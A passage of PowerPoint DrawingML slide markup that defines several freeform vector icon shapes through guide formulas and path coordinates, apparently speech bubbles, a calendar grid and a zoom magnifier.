                <a:ext cx="383636" cy="342532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 120"/>
                  <a:gd name="T1" fmla="*/ 0 h 107"/>
                  <a:gd name="T2" fmla="*/ 50 w 120"/>
                  <a:gd name="T3" fmla="*/ 0 h 107"/>
                  <a:gd name="T4" fmla="*/ 100 w 120"/>
                  <a:gd name="T5" fmla="*/ 41 h 107"/>
                  <a:gd name="T6" fmla="*/ 50 w 120"/>
                  <a:gd name="T7" fmla="*/ 81 h 107"/>
                  <a:gd name="T8" fmla="*/ 42 w 120"/>
                  <a:gd name="T9" fmla="*/ 81 h 107"/>
                  <a:gd name="T10" fmla="*/ 7 w 120"/>
                  <a:gd name="T11" fmla="*/ 93 h 107"/>
                  <a:gd name="T12" fmla="*/ 7 w 120"/>
                  <a:gd name="T13" fmla="*/ 91 h 107"/>
                  <a:gd name="T14" fmla="*/ 19 w 120"/>
                  <a:gd name="T15" fmla="*/ 75 h 107"/>
                  <a:gd name="T16" fmla="*/ 19 w 120"/>
                  <a:gd name="T17" fmla="*/ 72 h 107"/>
                  <a:gd name="T18" fmla="*/ 0 w 120"/>
                  <a:gd name="T19" fmla="*/ 41 h 107"/>
                  <a:gd name="T20" fmla="*/ 50 w 120"/>
                  <a:gd name="T21" fmla="*/ 0 h 107"/>
                  <a:gd name="T22" fmla="*/ 104 w 120"/>
                  <a:gd name="T23" fmla="*/ 91 h 107"/>
                  <a:gd name="T24" fmla="*/ 113 w 120"/>
                  <a:gd name="T25" fmla="*/ 104 h 107"/>
                  <a:gd name="T26" fmla="*/ 113 w 120"/>
                  <a:gd name="T27" fmla="*/ 107 h 107"/>
                  <a:gd name="T28" fmla="*/ 83 w 120"/>
                  <a:gd name="T29" fmla="*/ 96 h 107"/>
                  <a:gd name="T30" fmla="*/ 77 w 120"/>
                  <a:gd name="T31" fmla="*/ 96 h 107"/>
                  <a:gd name="T32" fmla="*/ 50 w 120"/>
                  <a:gd name="T33" fmla="*/ 89 h 107"/>
                  <a:gd name="T34" fmla="*/ 90 w 120"/>
                  <a:gd name="T35" fmla="*/ 75 h 107"/>
                  <a:gd name="T36" fmla="*/ 103 w 120"/>
                  <a:gd name="T37" fmla="*/ 60 h 107"/>
                  <a:gd name="T38" fmla="*/ 108 w 120"/>
                  <a:gd name="T39" fmla="*/ 41 h 107"/>
                  <a:gd name="T40" fmla="*/ 108 w 120"/>
                  <a:gd name="T41" fmla="*/ 37 h 107"/>
                  <a:gd name="T42" fmla="*/ 120 w 120"/>
                  <a:gd name="T43" fmla="*/ 62 h 107"/>
                  <a:gd name="T44" fmla="*/ 104 w 120"/>
                  <a:gd name="T45" fmla="*/ 88 h 107"/>
                  <a:gd name="T46" fmla="*/ 104 w 120"/>
                  <a:gd name="T47" fmla="*/ 9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0" h="107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78" y="0"/>
                      <a:pt x="100" y="18"/>
                      <a:pt x="100" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="63"/>
                      <a:pt x="78" y="81"/>
                      <a:pt x="50" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="81"/>
                      <a:pt x="45" y="81"/>
                      <a:pt x="42" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="91"/>
                      <a:pt x="19" y="93"/>
                      <a:pt x="7" y="93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14" y="87"/>
                      <a:pt x="19" y="82"/>
                      <a:pt x="19" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="74"/>
                      <a:pt x="19" y="73"/>
                      <a:pt x="19" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="65"/>
                      <a:pt x="0" y="53"/>
                      <a:pt x="0" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18"/>
                      <a:pt x="23" y="0"/>
                      <a:pt x="50" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="91"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="97"/>
                      <a:pt x="107" y="102"/>
                      <a:pt x="113" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="107"/>
                      <a:pt x="113" y="107"/>
                      <a:pt x="113" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="106"/>
                      <a:pt x="93" y="105"/>
                      <a:pt x="83" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="96"/>
                      <a:pt x="79" y="96"/>
                      <a:pt x="77" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="96"/>
                      <a:pt x="58" y="93"/>
                      <a:pt x="50" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="89"/>
                      <a:pt x="79" y="84"/>
                      <a:pt x="90" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="71"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="54"/>
                      <a:pt x="108" y="47"/>
                      <a:pt x="108" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="40"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="108" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="44"/>
                      <a:pt x="120" y="52"/>
                      <a:pt x="120" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="72"/>
                      <a:pt x="114" y="82"/>
                      <a:pt x="104" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="89"/>
                      <a:pt x="104" y="90"/>
                      <a:pt x="104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6" name="Freeform 131">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30820B42-03E2-4FF3-BD9B-764C4B1BD7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01222" y="1990229"/>
                <a:ext cx="338618" cy="336661"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 106"/>
                  <a:gd name="T1" fmla="*/ 53 h 105"/>
                  <a:gd name="T2" fmla="*/ 20 w 106"/>
                  <a:gd name="T3" fmla="*/ 49 h 105"/>
                  <a:gd name="T4" fmla="*/ 1 w 106"/>
                  <a:gd name="T5" fmla="*/ 43 h 105"/>
                  <a:gd name="T6" fmla="*/ 0 w 106"/>
                  <a:gd name="T7" fmla="*/ 53 h 105"/>
                  <a:gd name="T8" fmla="*/ 17 w 106"/>
                  <a:gd name="T9" fmla="*/ 91 h 105"/>
                  <a:gd name="T10" fmla="*/ 29 w 106"/>
                  <a:gd name="T11" fmla="*/ 75 h 105"/>
                  <a:gd name="T12" fmla="*/ 20 w 106"/>
                  <a:gd name="T13" fmla="*/ 53 h 105"/>
                  <a:gd name="T14" fmla="*/ 86 w 106"/>
                  <a:gd name="T15" fmla="*/ 53 h 105"/>
                  <a:gd name="T16" fmla="*/ 77 w 106"/>
                  <a:gd name="T17" fmla="*/ 75 h 105"/>
                  <a:gd name="T18" fmla="*/ 89 w 106"/>
                  <a:gd name="T19" fmla="*/ 91 h 105"/>
                  <a:gd name="T20" fmla="*/ 106 w 106"/>
                  <a:gd name="T21" fmla="*/ 53 h 105"/>
                  <a:gd name="T22" fmla="*/ 105 w 106"/>
                  <a:gd name="T23" fmla="*/ 43 h 105"/>
                  <a:gd name="T24" fmla="*/ 86 w 106"/>
                  <a:gd name="T25" fmla="*/ 49 h 105"/>
                  <a:gd name="T26" fmla="*/ 86 w 106"/>
                  <a:gd name="T27" fmla="*/ 53 h 105"/>
                  <a:gd name="T28" fmla="*/ 59 w 106"/>
                  <a:gd name="T29" fmla="*/ 20 h 105"/>
                  <a:gd name="T30" fmla="*/ 82 w 106"/>
                  <a:gd name="T31" fmla="*/ 36 h 105"/>
                  <a:gd name="T32" fmla="*/ 101 w 106"/>
                  <a:gd name="T33" fmla="*/ 30 h 105"/>
                  <a:gd name="T34" fmla="*/ 59 w 106"/>
                  <a:gd name="T35" fmla="*/ 0 h 105"/>
                  <a:gd name="T36" fmla="*/ 59 w 106"/>
                  <a:gd name="T37" fmla="*/ 20 h 105"/>
                  <a:gd name="T38" fmla="*/ 24 w 106"/>
                  <a:gd name="T39" fmla="*/ 36 h 105"/>
                  <a:gd name="T40" fmla="*/ 46 w 106"/>
                  <a:gd name="T41" fmla="*/ 20 h 105"/>
                  <a:gd name="T42" fmla="*/ 46 w 106"/>
                  <a:gd name="T43" fmla="*/ 0 h 105"/>
                  <a:gd name="T44" fmla="*/ 5 w 106"/>
                  <a:gd name="T45" fmla="*/ 30 h 105"/>
                  <a:gd name="T46" fmla="*/ 24 w 106"/>
                  <a:gd name="T47" fmla="*/ 36 h 105"/>
                  <a:gd name="T48" fmla="*/ 67 w 106"/>
                  <a:gd name="T49" fmla="*/ 83 h 105"/>
                  <a:gd name="T50" fmla="*/ 53 w 106"/>
                  <a:gd name="T51" fmla="*/ 85 h 105"/>
                  <a:gd name="T52" fmla="*/ 39 w 106"/>
                  <a:gd name="T53" fmla="*/ 83 h 105"/>
                  <a:gd name="T54" fmla="*/ 28 w 106"/>
                  <a:gd name="T55" fmla="*/ 99 h 105"/>
                  <a:gd name="T56" fmla="*/ 53 w 106"/>
                  <a:gd name="T57" fmla="*/ 105 h 105"/>
                  <a:gd name="T58" fmla="*/ 78 w 106"/>
                  <a:gd name="T59" fmla="*/ 99 h 105"/>
                  <a:gd name="T60" fmla="*/ 67 w 106"/>
                  <a:gd name="T61" fmla="*/ 83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6" h="105">
                    <a:moveTo>
                      <a:pt x="20" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="51"/>
                      <a:pt x="20" y="50"/>
                      <a:pt x="20" y="49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6"/>
                      <a:pt x="0" y="49"/>
                      <a:pt x="0" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="68"/>
                      <a:pt x="7" y="81"/>
                      <a:pt x="17" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="75"/>
                      <a:pt x="29" y="75"/>
                      <a:pt x="29" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="69"/>
                      <a:pt x="20" y="61"/>
                      <a:pt x="20" y="53"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="61"/>
                      <a:pt x="83" y="69"/>
                      <a:pt x="77" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="91"/>
                      <a:pt x="89" y="91"/>
                      <a:pt x="89" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="81"/>
                      <a:pt x="106" y="68"/>
                      <a:pt x="106" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="49"/>
                      <a:pt x="105" y="46"/>
                      <a:pt x="105" y="43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6" y="50"/>
                      <a:pt x="86" y="51"/>
                      <a:pt x="86" y="53"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="59" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="22"/>
                      <a:pt x="77" y="28"/>
                      <a:pt x="82" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="30"/>
                      <a:pt x="101" y="30"/>
                      <a:pt x="101" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="14"/>
                      <a:pt x="78" y="3"/>
                      <a:pt x="59" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="59" y="20"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="28"/>
                      <a:pt x="37" y="22"/>
                      <a:pt x="46" y="2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28" y="3"/>
                      <a:pt x="13" y="14"/>
                      <a:pt x="5" y="30"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24" y="36"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="84"/>
                      <a:pt x="58" y="85"/>
                      <a:pt x="53" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="85"/>
                      <a:pt x="43" y="84"/>
                      <a:pt x="39" y="83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35" y="103"/>
                      <a:pt x="44" y="105"/>
                      <a:pt x="53" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="105"/>
                      <a:pt x="71" y="103"/>
                      <a:pt x="78" y="99"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="67" y="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7" name="Freeform 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFBBA4F-273F-4CF9-96D3-52B36E8615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2752" y="2397354"/>
                <a:ext cx="317087" cy="334703"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 162"/>
                  <a:gd name="T1" fmla="*/ 65 h 171"/>
                  <a:gd name="T2" fmla="*/ 54 w 162"/>
                  <a:gd name="T3" fmla="*/ 86 h 171"/>
                  <a:gd name="T4" fmla="*/ 87 w 162"/>
                  <a:gd name="T5" fmla="*/ 65 h 171"/>
                  <a:gd name="T6" fmla="*/ 108 w 162"/>
                  <a:gd name="T7" fmla="*/ 86 h 171"/>
                  <a:gd name="T8" fmla="*/ 87 w 162"/>
                  <a:gd name="T9" fmla="*/ 65 h 171"/>
                  <a:gd name="T10" fmla="*/ 139 w 162"/>
                  <a:gd name="T11" fmla="*/ 65 h 171"/>
                  <a:gd name="T12" fmla="*/ 118 w 162"/>
                  <a:gd name="T13" fmla="*/ 86 h 171"/>
                  <a:gd name="T14" fmla="*/ 21 w 162"/>
                  <a:gd name="T15" fmla="*/ 129 h 171"/>
                  <a:gd name="T16" fmla="*/ 43 w 162"/>
                  <a:gd name="T17" fmla="*/ 150 h 171"/>
                  <a:gd name="T18" fmla="*/ 21 w 162"/>
                  <a:gd name="T19" fmla="*/ 129 h 171"/>
                  <a:gd name="T20" fmla="*/ 75 w 162"/>
                  <a:gd name="T21" fmla="*/ 129 h 171"/>
                  <a:gd name="T22" fmla="*/ 54 w 162"/>
                  <a:gd name="T23" fmla="*/ 150 h 171"/>
                  <a:gd name="T24" fmla="*/ 87 w 162"/>
                  <a:gd name="T25" fmla="*/ 129 h 171"/>
                  <a:gd name="T26" fmla="*/ 108 w 162"/>
                  <a:gd name="T27" fmla="*/ 150 h 171"/>
                  <a:gd name="T28" fmla="*/ 87 w 162"/>
                  <a:gd name="T29" fmla="*/ 129 h 171"/>
                  <a:gd name="T30" fmla="*/ 75 w 162"/>
                  <a:gd name="T31" fmla="*/ 96 h 171"/>
                  <a:gd name="T32" fmla="*/ 54 w 162"/>
                  <a:gd name="T33" fmla="*/ 117 h 171"/>
                  <a:gd name="T34" fmla="*/ 87 w 162"/>
                  <a:gd name="T35" fmla="*/ 96 h 171"/>
                  <a:gd name="T36" fmla="*/ 108 w 162"/>
                  <a:gd name="T37" fmla="*/ 117 h 171"/>
                  <a:gd name="T38" fmla="*/ 87 w 162"/>
                  <a:gd name="T39" fmla="*/ 96 h 171"/>
                  <a:gd name="T40" fmla="*/ 139 w 162"/>
                  <a:gd name="T41" fmla="*/ 96 h 171"/>
                  <a:gd name="T42" fmla="*/ 118 w 162"/>
                  <a:gd name="T43" fmla="*/ 117 h 171"/>
                  <a:gd name="T44" fmla="*/ 21 w 162"/>
                  <a:gd name="T45" fmla="*/ 96 h 171"/>
                  <a:gd name="T46" fmla="*/ 43 w 162"/>
                  <a:gd name="T47" fmla="*/ 117 h 171"/>
                  <a:gd name="T48" fmla="*/ 21 w 162"/>
                  <a:gd name="T49" fmla="*/ 96 h 171"/>
                  <a:gd name="T50" fmla="*/ 139 w 162"/>
                  <a:gd name="T51" fmla="*/ 11 h 171"/>
                  <a:gd name="T52" fmla="*/ 118 w 162"/>
                  <a:gd name="T53" fmla="*/ 0 h 171"/>
                  <a:gd name="T54" fmla="*/ 43 w 162"/>
                  <a:gd name="T55" fmla="*/ 11 h 171"/>
                  <a:gd name="T56" fmla="*/ 21 w 162"/>
                  <a:gd name="T57" fmla="*/ 0 h 171"/>
                  <a:gd name="T58" fmla="*/ 0 w 162"/>
                  <a:gd name="T59" fmla="*/ 171 h 171"/>
                  <a:gd name="T60" fmla="*/ 162 w 162"/>
                  <a:gd name="T61" fmla="*/ 0 h 171"/>
                  <a:gd name="T62" fmla="*/ 150 w 162"/>
                  <a:gd name="T63" fmla="*/ 161 h 171"/>
                  <a:gd name="T64" fmla="*/ 11 w 162"/>
                  <a:gd name="T65" fmla="*/ 44 h 171"/>
                  <a:gd name="T66" fmla="*/ 150 w 162"/>
                  <a:gd name="T67" fmla="*/ 1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171">
                    <a:moveTo>
                      <a:pt x="54" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="75" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="65"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="108" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="65"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="118" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="139" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="65"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="129"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="75" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="129"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="108" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="129"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="96"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="75" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="96"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="96"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="108" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="96"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="118" y="96"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="139" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="96"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="96"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="96"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="139" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="139" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="11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171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="150" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="1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8" name="Freeform 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9238D5C-7A30-4C42-BB7F-D9FB7A543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25786" y="3945601"/>
                <a:ext cx="268155" cy="268153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 84"/>
                  <a:gd name="T1" fmla="*/ 0 h 84"/>
                  <a:gd name="T2" fmla="*/ 0 w 84"/>
                  <a:gd name="T3" fmla="*/ 42 h 84"/>
                  <a:gd name="T4" fmla="*/ 42 w 84"/>
                  <a:gd name="T5" fmla="*/ 84 h 84"/>
                  <a:gd name="T6" fmla="*/ 84 w 84"/>
                  <a:gd name="T7" fmla="*/ 42 h 84"/>
                  <a:gd name="T8" fmla="*/ 42 w 84"/>
                  <a:gd name="T9" fmla="*/ 0 h 84"/>
                  <a:gd name="T10" fmla="*/ 42 w 84"/>
                  <a:gd name="T11" fmla="*/ 76 h 84"/>
                  <a:gd name="T12" fmla="*/ 8 w 84"/>
                  <a:gd name="T13" fmla="*/ 42 h 84"/>
                  <a:gd name="T14" fmla="*/ 42 w 84"/>
                  <a:gd name="T15" fmla="*/ 8 h 84"/>
                  <a:gd name="T16" fmla="*/ 76 w 84"/>
                  <a:gd name="T17" fmla="*/ 42 h 84"/>
                  <a:gd name="T18" fmla="*/ 42 w 84"/>
                  <a:gd name="T19" fmla="*/ 76 h 84"/>
                  <a:gd name="T20" fmla="*/ 26 w 84"/>
                  <a:gd name="T21" fmla="*/ 26 h 84"/>
                  <a:gd name="T22" fmla="*/ 58 w 84"/>
                  <a:gd name="T23" fmla="*/ 26 h 84"/>
                  <a:gd name="T24" fmla="*/ 58 w 84"/>
                  <a:gd name="T25" fmla="*/ 58 h 84"/>
                  <a:gd name="T26" fmla="*/ 26 w 84"/>
                  <a:gd name="T27" fmla="*/ 58 h 84"/>
                  <a:gd name="T28" fmla="*/ 26 w 84"/>
                  <a:gd name="T29" fmla="*/ 2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4" h="84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5"/>
                      <a:pt x="19" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="84"/>
                      <a:pt x="84" y="65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lose/>
                    <a:moveTo>
                      <a:pt x="42" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="76"/>
                      <a:pt x="8" y="61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6" y="23"/>
                      <a:pt x="76" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="61"/>
                      <a:pt x="61" y="76"/>
                      <a:pt x="42" y="76"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="26"/>
                      <a:pt x="58" y="26"/>
                      <a:pt x="58" y="26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26" y="58"/>
                      <a:pt x="26" y="58"/>
                      <a:pt x="26" y="58"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26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99" name="Freeform 134">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCFFF6C-495B-4F01-BCDA-2A1D656433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34320" y="3906455"/>
                <a:ext cx="467802" cy="467801"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 140 w 146"/>
                  <a:gd name="T1" fmla="*/ 123 h 146"/>
                  <a:gd name="T2" fmla="*/ 106 w 146"/>
                  <a:gd name="T3" fmla="*/ 94 h 146"/>
                  <a:gd name="T4" fmla="*/ 96 w 146"/>
                  <a:gd name="T5" fmla="*/ 89 h 146"/>
                  <a:gd name="T6" fmla="*/ 109 w 146"/>
                  <a:gd name="T7" fmla="*/ 54 h 146"/>
                  <a:gd name="T8" fmla="*/ 54 w 146"/>
                  <a:gd name="T9" fmla="*/ 0 h 146"/>
                  <a:gd name="T10" fmla="*/ 0 w 146"/>
                  <a:gd name="T11" fmla="*/ 54 h 146"/>
                  <a:gd name="T12" fmla="*/ 54 w 146"/>
                  <a:gd name="T13" fmla="*/ 108 h 146"/>
                  <a:gd name="T14" fmla="*/ 90 w 146"/>
                  <a:gd name="T15" fmla="*/ 95 h 146"/>
                  <a:gd name="T16" fmla="*/ 94 w 146"/>
                  <a:gd name="T17" fmla="*/ 106 h 146"/>
                  <a:gd name="T18" fmla="*/ 123 w 146"/>
                  <a:gd name="T19" fmla="*/ 140 h 146"/>
                  <a:gd name="T20" fmla="*/ 141 w 146"/>
                  <a:gd name="T21" fmla="*/ 141 h 146"/>
                  <a:gd name="T22" fmla="*/ 140 w 146"/>
                  <a:gd name="T23" fmla="*/ 123 h 146"/>
                  <a:gd name="T24" fmla="*/ 54 w 146"/>
                  <a:gd name="T25" fmla="*/ 90 h 146"/>
                  <a:gd name="T26" fmla="*/ 18 w 146"/>
                  <a:gd name="T27" fmla="*/ 54 h 146"/>
                  <a:gd name="T28" fmla="*/ 54 w 146"/>
                  <a:gd name="T29" fmla="*/ 18 h 146"/>
                  <a:gd name="T30" fmla="*/ 91 w 146"/>
                  <a:gd name="T31" fmla="*/ 54 h 146"/>
                  <a:gd name="T32" fmla="*/ 54 w 146"/>
                  <a:gd name="T33" fmla="*/ 90 h 146"/>
                  <a:gd name="T34" fmla="*/ 63 w 146"/>
                  <a:gd name="T35" fmla="*/ 27 h 146"/>
                  <a:gd name="T36" fmla="*/ 45 w 146"/>
                  <a:gd name="T37" fmla="*/ 27 h 146"/>
                  <a:gd name="T38" fmla="*/ 45 w 146"/>
                  <a:gd name="T39" fmla="*/ 45 h 146"/>
                  <a:gd name="T40" fmla="*/ 27 w 146"/>
                  <a:gd name="T41" fmla="*/ 45 h 146"/>
                  <a:gd name="T42" fmla="*/ 27 w 146"/>
                  <a:gd name="T43" fmla="*/ 63 h 146"/>
                  <a:gd name="T44" fmla="*/ 45 w 146"/>
                  <a:gd name="T45" fmla="*/ 63 h 146"/>
                  <a:gd name="T46" fmla="*/ 45 w 146"/>
                  <a:gd name="T47" fmla="*/ 81 h 146"/>
                  <a:gd name="T48" fmla="*/ 63 w 146"/>
                  <a:gd name="T49" fmla="*/ 81 h 146"/>
                  <a:gd name="T50" fmla="*/ 63 w 146"/>
                  <a:gd name="T51" fmla="*/ 63 h 146"/>
                  <a:gd name="T52" fmla="*/ 81 w 146"/>
